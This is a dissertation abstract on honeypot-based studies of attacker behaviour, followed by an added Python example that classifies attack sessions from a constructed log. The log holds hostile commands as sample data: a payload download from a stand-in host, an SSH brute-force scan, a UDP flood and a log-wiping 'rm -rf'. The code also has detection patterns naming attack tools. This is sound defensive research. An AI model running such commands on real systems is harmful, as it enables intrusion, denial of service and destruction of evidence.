Empirical studies based on Honeypots for Characterizing Attackers Behavior

Title of Document: EMPIRICAL STUDIES BASED ON HONEYPOTS FOR CHARACTERIZING ATTACKERS BEHAVIOR
Bertrand Sobesto, Doctor of Philosophy, 2015
Directed By: Associate Professor Michel Cukier, Reliability Engineering Program

The cybersecurity community has made substantial efforts to understand and mitigate security flaws in information systems. Oftentimes when a compromise is discovered, it is difficult to identify the actions performed by an attacker. In this study, we explore the compromise phase, i.e., the period after an attacker has gained access to a host through a vulnerability exposed by an information system and is exploiting that host. More specifically, we look at the main actions performed during the compromise and the factors deterring attackers from exploiting the compromised systems.

Because of the lack of security datasets on compromised systems, we need to deploy systems that let us study attackers and the different techniques they employ to compromise computers. Security researchers deploy target computers, called honeypots, that are not used by normal or authorized users. In this study we first describe the distributed honeypot network architecture deployed at the University of Maryland and the different honeypot-based experiments that enabled the data collection required to conduct the studies on attackers' behavior.

In the first experiment we explore the attackers' skill levels and the purpose of the malicious software installed on the honeypots. We determined the relative skill levels of the attackers and classified the different software installed. We then focused on the crimes committed by the attackers, i.e., the attacks launched from the honeypots by the attackers. We defined the different computer crimes observed (e.g., brute-force attacks and denial-of-service attacks) and their characteristics (whether they were coordinated and/or destructive). We looked at the impact of computer resource restrictions on the crimes and then at the deterrent effect of warning and surveillance. Lastly, we used different metrics related to the attack sessions to investigate the impact of surveillance on the attackers based on their country of origin.

During attacks, we found that attackers mainly installed IRC-based bot tools and sometimes shared their honeypot access. From the analysis of crimes, it appears that deterrence does not work; we showed that attackers seem to favor certain computer resources. Lastly, we observed that the presence of surveillance had no significant impact on the attack sessions; however, surveillance altered the behavior originating from a few countries.
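The abstract describes classifying each attack session by the crime launched from the honeypot (brute force, denial of service), by whether it was coordinated and/or destructive, and then comparing session metrics by country of origin and by whether the attacker was under surveillance (a warning banner). The Python below is an added illustration of that style of session analysis over honeypot command logs; it is not the dissertation's code or taxonomy. The log records are constructed, the command-pattern heuristics are assumptions, and the rule that a session counts as "coordinated" when the same payload URL is fetched from more than one source address is an assumption made for this example.

```python
"""Classify constructed honeypot attack sessions and compute per-session metrics.
Added example; the records, patterns and rules below are assumptions, not the study's."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from pprint import pprint

# Constructed records: session_id,source_ip,country,banner_shown,timestamp,command
RAW_LOG = """\
s1,203.0.113.5,RO,no,2014-03-01T10:00:00,wget http://198.51.100.7/bot.tgz
s1,203.0.113.5,RO,no,2014-03-01T10:00:20,tar xzf bot.tgz
s1,203.0.113.5,RO,no,2014-03-01T10:01:00,./eggdrop -m eggdrop.conf
s2,198.51.100.9,US,yes,2014-03-01T11:00:00,wget http://198.51.100.7/scan.tgz
s2,198.51.100.9,US,yes,2014-03-01T11:01:00,./ssh-scan 22 192.0.2.0/24 pass.txt
s3,192.0.2.33,RO,no,2014-03-02T09:00:00,wget http://198.51.100.7/bot.tgz
s3,192.0.2.33,RO,no,2014-03-02T09:00:40,./eggdrop -m eggdrop.conf
s4,203.0.113.77,CN,yes,2014-03-02T13:00:00,perl udp.pl 198.51.100.20 0 65535 0
s4,203.0.113.77,CN,yes,2014-03-02T13:05:00,rm -rf /var/log
"""

# Heuristic keyword patterns (assumed for this example) mapping commands to crime types.
CRIME_PATTERNS = {
    "brute_force": re.compile(r"ssh-scan|hydra|medusa|brute", re.I),
    "dos": re.compile(r"udp\.pl|flood|synk", re.I),
    "irc_bot": re.compile(r"eggdrop|psybnc|energymech", re.I),
}
DESTRUCTIVE = re.compile(r"rm -rf /|mkfs|dd if=", re.I)
DOWNLOAD = re.compile(r"\b(?:wget|curl)\s+(\S+)")


@dataclass
class Session:
    sid: str
    src_ip: str
    country: str
    banner: bool                     # True if a warning banner was shown at login
    times: list = field(default_factory=list)
    commands: list = field(default_factory=list)

    def duration_s(self) -> float:
        return (max(self.times) - min(self.times)).total_seconds()


def parse_sessions(raw: str) -> dict:
    """Group log lines into Session objects keyed by session id."""
    sessions = {}
    for line in raw.strip().splitlines():
        sid, ip, cc, banner, ts, cmd = line.split(",", 5)
        s = sessions.setdefault(sid, Session(sid, ip, cc, banner == "yes"))
        s.times.append(datetime.fromisoformat(ts))
        s.commands.append(cmd)
    return sessions


def classify(s: Session) -> dict:
    """Label one session with the crime types, destructiveness and payload URLs seen."""
    joined = "\n".join(s.commands)
    return {
        "crimes": sorted(n for n, p in CRIME_PATTERNS.items() if p.search(joined)),
        "destructive": bool(DESTRUCTIVE.search(joined)),
        "downloads": [m.group(1) for m in (DOWNLOAD.search(c) for c in s.commands) if m],
    }


def coordinated_sessions(sessions: dict, classes: dict) -> set:
    """A session is coordinated if one of its payload URLs was fetched from >1 source IP."""
    ips_by_url = defaultdict(set)
    for sid, s in sessions.items():
        for url in classes[sid]["downloads"]:
            ips_by_url[url].add(s.src_ip)
    return {sid for sid in sessions
            if any(len(ips_by_url[u]) > 1 for u in classes[sid]["downloads"])}


def country_banner_metrics(sessions: dict) -> dict:
    """Session count, mean duration and mean command count per (country, banner_shown)."""
    buckets = defaultdict(list)
    for s in sessions.values():
        buckets[(s.country, s.banner)].append(s)
    return {k: {"n": len(v),
                "mean_duration_s": sum(x.duration_s() for x in v) / len(v),
                "mean_commands": sum(len(x.commands) for x in v) / len(v)}
            for k, v in buckets.items()}


def analyze(raw: str = RAW_LOG) -> dict:
    sessions = parse_sessions(raw)
    classes = {sid: classify(s) for sid, s in sessions.items()}
    coord = coordinated_sessions(sessions, classes)
    for sid in classes:
        classes[sid]["coordinated"] = sid in coord
    return {"sessions": classes, "by_country": country_banner_metrics(sessions)}


if __name__ == "__main__":
    pprint(analyze())
```

On the constructed log, sessions s1 and s3 both fetch the same bot archive from different addresses and are therefore flagged as coordinated IRC-bot installs, s2 is a brute-force session, and s4 is a destructive denial-of-service session. The by-country table is the shape of comparison the abstract describes for judging whether a banner changed session length or activity for attackers from a given country; with real data one would feed these per-bucket metrics into a statistical test rather than compare means by eye.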
